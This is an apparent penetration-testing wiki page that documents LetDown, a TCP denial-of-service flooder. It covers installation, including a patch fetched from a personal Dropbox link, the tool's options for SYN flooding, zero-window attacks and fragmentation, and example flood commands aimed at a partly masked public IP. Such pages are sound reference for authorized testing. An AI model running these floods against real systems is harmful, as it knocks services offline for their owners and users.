Complemento/LetDown
Jump to navigation
Jump to search
| You are here: | LetDown
|
Description
LetDown is a tcp flooder that is inspired from the article "TCP Resource Exhaustion and Botched Disclosure" from Fyodor (http://insecure.org/stf/tcp-dos-attack-explained.html). It has an (experimental) userland TCP/IP stack, and supports multistage payloads for complex protocols, fragmentation of packets and variable tcp window.
Installation
Download and uncompress
First of all download complemento:
$ mkdir -p /pentest/enumeration/ $ cd /pentest/enumeration/ $ wget http://downloads.sourceforge.net/project/complemento/complemento/complemento-0.7.6/complemento-0.7.6.tar.gz $ tar xzvf complemento-0.7.6.tar.gz $ cd complemento/letdown/
At this stage, check your version of Python:
$ python -V Python 2.6.5
Python 2.5
If your version of Python is 2.5, you can directly compile:
$ make
Python 2.6
If you have Python 2.6, you need to apply this patch:
$ wget http://dl.dropbox.com/u/10761700/letdown-python2.6.patch $ patch -p0 < letdown-python2.6.patch
Then you can compile:
$ make
Note
The make command will output warnings. They aren't errors, just warning, and nothing blocking.
Usage
Basic syntax
$ sudo ./letdown -d destination ip -p port [options]
Note
Notice that letdown requires root privileges.
Common Options
- -d
- destination ip address or dns name, target
- -p
- destination port
- -s
- source ip address
- -x
- first source port (default 1025)
- -y
- last source port (default 65534)
- -l
- enables infinite loop mode
- -i
- network interface
- -t
- sleep time in microseconds (default 10000)
- -a
- max time in second for waiting responses (default 40)
Extra options
- -v
- verbosity level (0=quiet, 1=normal, 2=verbose)
- -f
- automagically set firewall rules for blocking rst packet generated by the kernel
- examples: -f iptables, -f blackhole (for freebsd)
- -L
- special interaction levels with the target
- s: syn flooding, no 3-way-handshake
- a: send acknowledgment packets (polite mode)
- f: send finalize packets (include polite mode)
- r: send reset packets (check firewall rules...)
- -W
- window size for ack packets (ex: 0-window attack)
- -O
- enable ack fragmentation and set fragment offset delta
- -C
- fragment counter if fragmentation is enabled (default 1)
- -P
- payload file (see payloads directory...)
- -M
- multistage payload file (see payloads directory...)
Examples
- Generic attack
$ sudo ./letdown -d 208.xx.xx.xx -s 192.168.1.x -p 21
- Attack against a webserver using payload and firewall options:
$ sudo ./letdown -d 208.xx.xx.xx -s 192.168.1.x -p 80 -f iptables -P payloads/http.txt
- Connections from 3 ports < 1024 and with the time option:
$ sudo ./letdown -d 208.xx.xx.xx -s 192.168.1.x -p 80 -x 80 -y 100 -t 10000